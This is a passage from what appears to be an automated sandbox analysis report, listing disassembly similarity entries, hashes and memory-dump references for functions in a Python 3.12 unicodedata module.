                                                                                                                                                                                                                                                • API ID: CompareStringUnicode_With$Mem_$FreeMallocSubtypeType_
                                                                                                                                                                                                                                                • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                                                                                                                                                                                                                • API String ID: 1723213316-3528878251
                                                                                                                                                                                                                                                • Opcode ID: 0183ee75f38b3d9b4e000f242270cd4c61522a137d2eba0fb5a9939ca12be486
                                                                                                                                                                                                                                                • Instruction ID: 4fa4139a896eead24ce7459679d8cb16617dfeff50a7e3f9280f62d53e9b371f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0183ee75f38b3d9b4e000f242270cd4c61522a137d2eba0fb5a9939ca12be486
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1514B61F0E662A2FAF8EB2595717BD6690BF51BC8F0471B1D94EC6A81DF2CE401E700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                                • String ID: $%04X$a unicode character$argument$decomposition
                                                                                                                                                                                                                                                • API String ID: 1318908108-4056541097
                                                                                                                                                                                                                                                • Opcode ID: 2aa5bcb769f9567ef44792d0b8645ff4acf96607a2464068c30a17cc2bf935c6
                                                                                                                                                                                                                                                • Instruction ID: 41e36be7f679d6956c83016bce2af03505bc9e4cbcb1dc35b691469b2423dbd9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2aa5bcb769f9567ef44792d0b8645ff4acf96607a2464068c30a17cc2bf935c6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2941E9A1F0AA82A1EBB88B14E8343FD63A1FF59B98F446271C95E476C4DF2CE545D300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_$ArgumentCheckDigitErr_FromLongLong_PositionalStringUnicode_
                                                                                                                                                                                                                                                • String ID: a unicode character$argument 1$digit$not a digit
                                                                                                                                                                                                                                                • API String ID: 4245020737-4278345224
                                                                                                                                                                                                                                                • Opcode ID: d2c025be6f32e1fa96eb3f1c6703f3e18d3fbf46a97c983d3ea169cd79d16b21
                                                                                                                                                                                                                                                • Instruction ID: 763ffa3de932a1641d5463749e3919cb273d8cb5d101b72c8f082eeeb6d402ac
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2c025be6f32e1fa96eb3f1c6703f3e18d3fbf46a97c983d3ea169cd79d16b21
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92217F35F0AA42A1EBA88B19D4603BDA365FF45B88F5470B1C90E87B54DF7DE545E300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
                                                                                                                                                                                                                                                • Instruction ID: c9538c669587173dcd97a81538dc2a53bb21ebe13860eefb15214c24bc8c2983
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F817921F0A64366FBFCABA594603FD2290BF85788F54A0B5D90C937D2DE2CE845E710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                                • String ID: a unicode character$argument$category
                                                                                                                                                                                                                                                • API String ID: 1318908108-2068800536
                                                                                                                                                                                                                                                • Opcode ID: c31e599aff6ce8fd118d7930930d13bb61e4023c7ccaaddb711cf16cebfbc0cd
                                                                                                                                                                                                                                                • Instruction ID: 5a94b5fba4c478a2ccd2bcc19b3c0b41530b44eea3b2918a2fa91f424fbdd890
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c31e599aff6ce8fd118d7930930d13bb61e4023c7ccaaddb711cf16cebfbc0cd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74519362B1A646A2EBBCDB09D4743FC62A1FB44B88F442175DA4E47790DF2CE891E300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                                • String ID: a unicode character$argument$bidirectional
                                                                                                                                                                                                                                                • API String ID: 1318908108-2110215792
                                                                                                                                                                                                                                                • Opcode ID: 2be184d8cc6ee1ee00809d45acc887d572eb9887141ab2374770304697e252f3
                                                                                                                                                                                                                                                • Instruction ID: b0b6b576fa0d53ab92bd0f58e93ca1519a93fd18ccb31c7f36abd34cdba4781f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2be184d8cc6ee1ee00809d45acc887d572eb9887141ab2374770304697e252f3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0241C662B1AA82A1EBBC8B15D4713FD23A1FF04798F447075DA5E47694CE2DE890E300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _PyArg_CheckPositional.PYTHON312 ref: 00007FFD8A2536E7
                                                                                                                                                                                                                                                • _PyArg_BadArgument.PYTHON312 ref: 00007FFD8A25371A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A2511B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFD8A2511E2
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A2511B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFD8A2511FA
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A2511B0: PyType_IsSubtype.PYTHON312 ref: 00007FFD8A25121D
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_CompareStringUnicode_With$ArgumentCheckPositionalSubtypeType_
                                                                                                                                                                                                                                                • String ID: argument 1$argument 2$normalize$str
                                                                                                                                                                                                                                                • API String ID: 4101545800-1320425463
                                                                                                                                                                                                                                                • Opcode ID: 6a3206665d50624963465f038f79663c2d3d68664346081dad0779ef5a43a2b4
                                                                                                                                                                                                                                                • Instruction ID: 7d0eec05176021a99d54a07de3258e552af52be143c82c18ebca27f24a7c9524
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a3206665d50624963465f038f79663c2d3d68664346081dad0779ef5a43a2b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B1182A1F09686A1EAA89B55E4707FD2760BF04FC8F44A0B1D90D0B694CE2CE594E740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                                • String ID: argument 1$argument 2$is_normalized$str
                                                                                                                                                                                                                                                • API String ID: 3876575403-184702317
                                                                                                                                                                                                                                                • Opcode ID: 7c950a274d1c530a4e2b2ee5c75bc666441a244dd8d061769435580234d1272f
                                                                                                                                                                                                                                                • Instruction ID: 9e4e85276c4121b771cf1d3f8cca87b60ebc4c7cf2a90c92376b5c1776e6f4d9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c950a274d1c530a4e2b2ee5c75bc666441a244dd8d061769435580234d1272f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2401A560F0AA86B5EBA88B45E8A57FD6351FF04FC8F44A0B1D91D07654CF6CE585D700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ArgumentSubtypeType_
                                                                                                                                                                                                                                                • String ID: a unicode character$argument$east_asian_width
                                                                                                                                                                                                                                                • API String ID: 1522575347-3913127203
                                                                                                                                                                                                                                                • Opcode ID: 7b891638b4a45313673a93616f0d216ddcfc167a757208e07fea525010fbe4c5
                                                                                                                                                                                                                                                • Instruction ID: 70a64700ce068af379c4bff9ee2fccbfb7071216f159682f90903bf0346bd955
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b891638b4a45313673a93616f0d216ddcfc167a757208e07fea525010fbe4c5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF21D721F0AA82A1EBAC975598743BDA7A2FF44B88F44A1B5D61E03754DF2CE494E700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DoubleErr_Float_FromNumericStringSubtypeType_Unicode_
                                                                                                                                                                                                                                                • String ID: not a numeric character
                                                                                                                                                                                                                                                • API String ID: 1034370217-2058156748
                                                                                                                                                                                                                                                • Opcode ID: 8a252d4494416c01de2789638a4ecad70e8503ee6f61509ac703bcac1011aaf0
                                                                                                                                                                                                                                                • Instruction ID: a23412f7044c14633b324827e1bc0b7131d64db05139281db82d5f87eaa86204
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a252d4494416c01de2789638a4ecad70e8503ee6f61509ac703bcac1011aaf0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A216F21B0B942A5EAFD8B2AD4342BCA6A2BF44B88F04A1B0C91E47654DF2CF441E700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DecimalDigitErr_FromLongLong_StringSubtypeType_Unicode_
                                                                                                                                                                                                                                                • String ID: not a decimal
                                                                                                                                                                                                                                                • API String ID: 3750391552-3590249192
                                                                                                                                                                                                                                                • Opcode ID: 30abf5ee6eb06e173e75edeec379c503cf6988d9432b31e93c7c03d97c2bbd6f
                                                                                                                                                                                                                                                • Instruction ID: 9639b459b6fe96358849a0ca5fe64f170fdfe996ea7b4cdcb07a2a15b932e0e3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30abf5ee6eb06e173e75edeec379c503cf6988d9432b31e93c7c03d97c2bbd6f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69110321B4A952A1EBA98B29E4743BD6792BF44B8CF48A4B0CE4F47654DF2CE441E340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                                • String ID: a unicode character$argument 1$decimal
                                                                                                                                                                                                                                                • API String ID: 3876575403-2474051849
                                                                                                                                                                                                                                                • Opcode ID: d3484de5ee44d7a33ec5e53d5364025946576caca118cb4f9bd9e3e7fb1b6d42
                                                                                                                                                                                                                                                • Instruction ID: 8153b92f141e0972125418e4ffcd91a0609cadec5d58b895d82a7d67d34dc817
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3484de5ee44d7a33ec5e53d5364025946576caca118cb4f9bd9e3e7fb1b6d42
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0311C431B0AA42A5EAA89B46E4603EDA361FB44BC8F546072DE0E47765CF3CE595D300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
